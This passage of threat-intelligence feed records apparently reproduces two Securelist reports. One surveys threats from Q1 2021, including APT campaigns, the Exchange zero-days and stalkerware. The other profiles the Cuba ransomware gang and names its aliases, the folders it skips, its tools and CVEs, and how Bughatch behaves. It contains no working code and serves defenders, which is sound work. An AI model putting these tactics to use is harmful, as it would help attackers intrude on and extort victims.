"SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n## Targeted attacks\n\n### Putting the 'A' into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others, is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. 
In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus's use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. 
While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group's other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim's environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim's intranet to their remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. 
During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim's network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. 
Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads QuasarRAT.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor's activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. 
Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim's search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers' servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. 
\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel's processors in its computers. 
The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the "downloadURL" field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. 
The developers of these programs are also updating their code to include support for the M1 chip, including the Pirrit and Bnodlero families.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don't just add support for new platforms: sometimes they use new programming languages to develop their 'products'. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere's a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage data when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. 
Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there's also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person's knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone's activities. Notwithstanding the _relative_ decline, 53,870 is a big number. 
Moreover, these figures cover Kaspersky customers only: no doubt the real figure is considerably higher.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\nRank | Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\nRank | Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it's difficult for anyone targeted with such programs to see that 
it's installed on their device \u2013 they hide the app's icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. 
The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, including those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data, or access to company resources \u2013 for example, credentials allowing access to cloud-based systems. \nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a "test" message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient's mail client and the IP address. This data lets the attackers build a profile on a specific person who they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. 
For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to "phish" corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee's account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company's reputation and result in financial loss. 
There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO's voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company's branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-17T09:24:48", "description": "\n\n## Introduction\n\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\n\n## Cuba ransomware gang\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01.png>)\n\nCuba data leak site\n\nThe group's offensives first got on our radar in late 2020. Back then, the cybercriminals had not yet adopted the moniker "Cuba"; they were known as "Tropical Scorpius".\n\nCuba mostly targets organizations in the United States, Canada and Europe. 
The gang has scored a series of resonant attacks on oil companies, [financial services](<https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/>), [government agencies](<https://techcrunch.com/2022/08/31/montenegro-ransomware-attack-embassy-warning/>) and healthcare providers.\n\nAs with most cyberextortionists lately, the Cuba gang encrypts victims' files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\n\nThe Cuba gang's exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\n\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\n\n * ColdDraw\n * Tropical Scorpius\n * Fidel\n * Cuba\n\nThis past February, we came across another name for the gang \u2014 "V Is Vendetta", which deviated from the hackers' favorite Cuban theme. 
This might have been a moniker used by a sub-group or affiliate.\n\nThere is an obvious connection with the Cuba gang: the newly discovered group's website is hosted under the Cuba domain:\n\n_http[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02.png>)\n\nWebsite of V IS VENDETTA\n\nCuba remains active as of the time of writing, and we keep hearing about new extortion victims.\n\n## Victimology\n\n_In this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors' reports and the data leak site of the ransomware gang itself._\n\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03.png>)\n\nGeographic distribution of Cuba victims\n\n## Ransomware\n\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\n\n## Cuba extortion model\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04.png>)\n\nExtortion models\n\nFour extortion models exist today in terms of tools used for pressuring the victim.\n\n * Single extortion: encrypting data and demanding a ransom just for decryption.\n * Double extortion: besides encrypting, attackers steal sensitive information. 
They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\n * Triple extortion: adding a threat to expose the victim's internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got [DDoS'ed](<https://techcrunch.com/2022/08/22/entrust-lockbit-ddos-ransomware/>), possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they [stated openly](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/>), setting an example for others. To be fair, [isolated cases of triple extortion](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-add-ddos-attacks-to-their-extortion-arsenal/>) predate the LockBit case.\n * The fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim's investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent [hack of Bluefield University in Virginia](<https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/>), where the AvosLocker ransomware gang hijacked the school's emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school's management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\n\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. 
This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\n\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\n * \\windows\\\n * \\program files\\microsoft office\\\n * \\program files (x86)\\microsoft office\\\n * \\program files\\avs\\\n * \\program files (x86)\\avs\\\n * \\$recycle.bin\\\n * \\boot\\\n * \\recovery\\\n * \\system volume information\\\n * \\msocache\\\n * \\users\\all users\\\n * \\users\\default user\\\n * \\users\\default\\\n * \\temp\\\n * \\inetcache\\\n * \\google\\\n\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png>)\n\nList of services that the Cuba ransomware terminates\n\nBesides encrypting, the group steals sensitive data that it discovers inside the victim's organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\n\n * Financial documents\n * Bank statements\n * Company accounts details\n * Source code, if the company is a software developer\n\n## Arsenal\n\nThe group employs both well-known, "classic" credential access tools, such as mimikatz, and self-written applications. 
It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of [ProxyShell](<https://www.computerweekly.com/news/252505767/Half-of-MS-Exchange-servers-at-risk-in-ProxyShell-debacle>) and [ProxyLogon](<https://www.computerweekly.com/news/252497200/Emergency-patch-addresses-MS-Exchange-Server-zero-days>) for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png>)\n\n**Malware**\n\n * Bughatch\n * Burntcigar\n * Cobeacon\n * Hancitor (Chanitor)\n * Termite\n * SystemBC\n * Veeamp\n * Wedgecut\n * RomCOM RAT\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png>)\n\n**Tools**\n\n * Mimikatz\n * PowerShell\n * PsExec\n * Remote Desktop Protocol\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png>)\n\n**Vulnerabilities**\n\nProxyShell:\n\n * CVE-2021-31207\n * CVE-2021-34473\n * CVE-2021-34523\n\nProxyLogon:\n\n * CVE-2021-26855\n * CVE-2021-26857\n * CVE-2021-26858\n * CVE-2021-27065\n\nVeeam vulnerabilities:\n\n * [CVE-2022-26501](<https://vulners.com/cve/CVE-2022-26501>)\n * [CVE-2022-26504](<https://vulners.com/cve/CVE-2022-26504>)\n * [CVE-2022-26500](<https://vulners.com/cve/CVE-2022-26500>)\n\n[ZeroLogon](<https://en.wikipedia.org/wiki/Zerologon>):\n\n * CVE-2020-1472\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09.png>)\n\nMapping of the attack arsenal to MITRE ATT&CK\u00ae tactics\n\n## Profits\n\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. 
The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10.png>)\n\nPart of the transaction tree in the BTC network\n\n## Investigation of a Cuba-related incident and analysis of the malware\n\n### Host: SRV_STORAGE\n\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as "SRV_STORAGE" in this report. Telemetry data showed three suspicious new files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11.png>)\n\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\n\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png>)\n\nContents of the .bat file that we found\n\nLet us take a look inside the suspicious DLL.\n\n#### Bughatch\n\nThe komar65.dll library is also known as "Bughatch", a name it was given in a [report](<https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware>) by Mandiant.\n\nThe first thing that caught our attention was the path to the PDB file. There's a folder named "mosquito" in it, which translates into Russian as "komar". 
The latter is part of the DLL name, suggesting the gang may include Russian speakers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13.png>)\n\nPath to the komar65.dll PDB file\n\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\n\n * com, apparently used for checking external connectivity\n * The gang's command-and-control center. The malware will try calling home if the initial ping goes through.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14.png>)\n\nAnalysis of komar65.dll\n\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15.png>)\n\nBughatch activity\n\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware's functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16.jpeg>)\n\nFiles we found on the Cuba C2 servers\n\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. 
